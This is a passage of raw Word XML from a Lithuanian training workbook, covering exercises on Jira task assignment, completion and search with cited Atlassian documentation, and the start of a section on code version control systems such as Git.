      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Issue types</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId199" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/adminjiracloud/issue-types-844500742.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Creating issues and sub-tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">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8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. APRAŠYKITE KAIP YRA PRISKIRIAMI DARBAI (UŽDUOTYS) ATSKIRIEMS VARTOTOJAMS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti Jira dokumentaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId201" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jiracorecloud/working-with-issues-765593800.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Watch, share, and comment on issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId202" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/watch-share-and-comment-on-issues-962349057.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">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9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. APRAŠYKITE KAIP YRA UŽBAIGIAMI DARBAI (UŽDUOTYS) JIRA DARBŲ PLANAVIMO SISTEMOJE. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti Jira dokumentaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jira Sprints Tutorial</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId203" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/agile/tutorials/sprints.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId204" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Creating issues and sub-tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId205" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Deploying a release.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId206" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">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10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE KAIP YRA VYKDOMA PAIEŠKA JIRA DARBŲ PLANAVIMO SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="00FB3B5F">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti Jira dokumentaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Basic searching</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId207" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Searching for issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Advanced searching</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId209" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Advanced searching</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId210" w:history="1">
        <w:r w:rsidRPr="00C2292E">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/advanced-searching-764478330.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C2292E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C2292E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="995" w:name="_Toc550421788"/>
      <w:bookmarkStart w:id="996" w:name="_Toc10444038"/>
      <w:bookmarkStart w:id="997" w:name="_Toc13095585"/>
      <w:bookmarkStart w:id="998" w:name="_Toc13833479"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">okymosi rezultatas. Vykdyti programinio kodo versijavimą naudojant programinio kodo versijavimo įrankius, tinkamus </w:t>
      </w:r>
      <w:r w:rsidR="00025993">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">pasirinktai programavimo </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kalbai.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="995"/>
      <w:bookmarkEnd w:id="996"/>
      <w:bookmarkEnd w:id="997"/>
      <w:bookmarkEnd w:id="998"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽRAŠYKITE TRIS KODO VERSIJŲ KONTROLĖS SISTEMAS, APRAŠYKITE PAGRINDINES VERSIJAVIMO SISTEMŲ FUNKCIJAS</w:t>
      </w:r>
      <w:r w:rsidR="00624474">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Dažniausiai naudojamos kodo versijų kontrolės sistemos: Git, Mercurial, SVN, </w:t>
      </w:r>
      <w:r w:rsidR="00852592">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Azure DevOps, BitKeeper ir pan.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pagrindinės kodo versijavimo sistemų funkcijos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. versijuoja kiekvieną kodo pakeitimą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. palaiko keletą kodo versijų;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. gali atstatyti kodą į bet kurią prieš tai buvusią būseną;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4. leidžia dirbti komandai vienu metu prie to paties kodo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pavyzdys:</w:t>
      </w:r>
      <w:r w:rsidR="00624474">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s esate Web tinklapių programuotojas ir kuriate tinklalapius pagal dizainerio pateiktus šablonus. Kiekvieną savo parašytą kodo versiją jus galite išsaugoti ir grįžti prie jos bet kokiu metu. Galite turėti kelias to pačio kodo versijas. Galite dirbti komandoje ir dalintis savo patirtimi su kitais programuotojais.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARSISIŲSKITE, ĮSIDIEKITE GIT KODO VERSIJAVIMO ĮRANKĮ</w:t>
      </w:r>
      <w:r w:rsidR="00624474">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
